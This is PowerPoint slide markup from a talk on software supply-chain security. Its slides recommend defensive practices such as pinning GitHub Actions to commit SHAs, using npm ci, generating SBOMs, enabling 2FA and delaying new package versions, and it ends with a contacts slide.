        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="1664208"/>
            <a:ext cx="11064240" cy="2788920"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2951"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="101A44">
              <a:alpha val="82000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FFFFFF">
                <a:alpha val="22000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="127000" dist="38100" dir="5400000" algn="bl" rotWithShape="0">
              <a:srgbClr val="05081A">
                <a:alpha val="45000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-BG"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Shape 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C101D307-A138-B142-2901-ABD9AC610138}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="1920240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6" name="Text 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A2B1C0B-73AB-A4C2-B255-76894312CD92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="1920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1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{610F236C-60AB-7DA3-C531-91BB407CD9D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1554480" y="1947672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Pin your GitHub Actions  —  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to a commit SHA, not a tag</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Shape 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F02A58A-23B3-8D24-41C2-84102C734233}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="2414016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29" name="Text 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E898BC63-1D9D-41F6-9470-1BEC27B2A79E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="241401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2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38323DCA-9B66-099A-CD26-07E0D6800813}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1554480" y="2441448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Switch CI to npm ci  —  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hash-pinned, reproducible installs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Shape 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D27ED777-0768-E8F4-9103-00572549794D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="2907792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2" name="Text 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CB5B1C1-9899-D40A-4BA3-B180A0E88A0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="290779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3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Text 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{380C715E-6398-7A07-CACB-59362C60C91E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1554480" y="2935224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Generate an SBOM  —  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syft today, so you can answer fast later</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Shape 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C072AD33-A032-0DB5-8B0D-61963D30F36D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="3401568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5" name="Text 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25AD6BAD-967C-C5AC-CDA3-2BA4F93ADBE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="340156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4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Text 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4A81A32-6459-D3F1-C625-1F93407C4C14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1554480" y="3429000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Turn on 2FA / passkeys  —  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on every maintainer &amp; registry account</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Shape 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C45E7BC-C6FC-CD90-B1D2-0301FF83C7EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="3895344"/>
            <a:ext cx="457200" cy="457200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38" name="Text 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD9DC5A2-9AA7-3DA1-2BC7-E23A88146184}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="389534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B102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5</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Text 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CEBAAB1D-E360-DAD5-F875-F798A08FF52D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1554480" y="3922776"/>
            <a:ext cx="9692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Add a cooldown  —  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="155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delay adopting brand-new versions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1550" dirty="0"/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47F9FCE2-CA0F-026E-D6E0-2749CBDC885D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="640080" y="4892040"/>
            <a:ext cx="10972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Next time you run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5CE6A0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npm install</a:t>
            </a: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, ask yourself:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="22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who did I just give a shell on my machine?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4816090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Google Shape;287;g2dd5d6240d7_0_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3550" y="455812"/>
            <a:ext cx="3518450" cy="1923015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QR code to kaloyangeorgiev.space">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFA2690C-EE53-307F-CF73-CCB493379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55812"/>
            <a:ext cx="1923015" cy="1923015"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D18AAE41-A13D-3D64-9EF9-4A23355D9BC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="850392" y="27889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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5CE6A0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Questions? Let’s talk about what you pulled this morning.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C787E86-1F33-F8C9-6558-E28193A0017F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="850392" y="36576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Contacts</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Shape 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DBFF8A0-6CBF-8657-5678-D5D5ACFB8014}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="850392" y="416966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4C35A147-12D2-C233-A533-E9125057FF37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106424" y="40690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Linkedin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profile</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400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4630F5FD-BA9A-75AC-8142-899E5D43A13C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3776472" y="416966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6F839287-10EB-0ADD-6296-F3B193EF559B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4032504" y="406908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GitHub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profile</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Shape 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB32FC9D-0023-ACDE-BE4E-9E5907D6598F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="850392" y="467258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FDA3AED8-0059-4C99-B38D-98DBA5858D94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106424" y="45720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Facebook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profile</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Shape 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7F861E8-08BF-65B0-D91B-B3D1E3243C33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3776472" y="4672584"/>
            <a:ext cx="146304" cy="146304"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="5CE6A0"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-BG"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C26AB881-41E7-4F0A-1312-85DDD5152B94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4032504" y="457200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Instagram  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C9D6FF"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Montserrat" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>profile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st mast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aea0679f-09fa-4528-8ac1-fa7f6af28b52}" enabled="1" method="Standard" siteId="{07018c2a-e7d8-4bf1-9456-092ad6aecf0f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11328</TotalTime>
  <Words>3517</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>345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Verdana</vt:lpstr>
      <vt:lpstr>Montserrat</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>test master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Kaloyan Georgiev</cp:lastModifiedBy>
  <cp:revision>46</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-04-20T07:02:23Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-10-16T06:32:55Z</dcterms:modified>
</cp:coreProperties>
</file>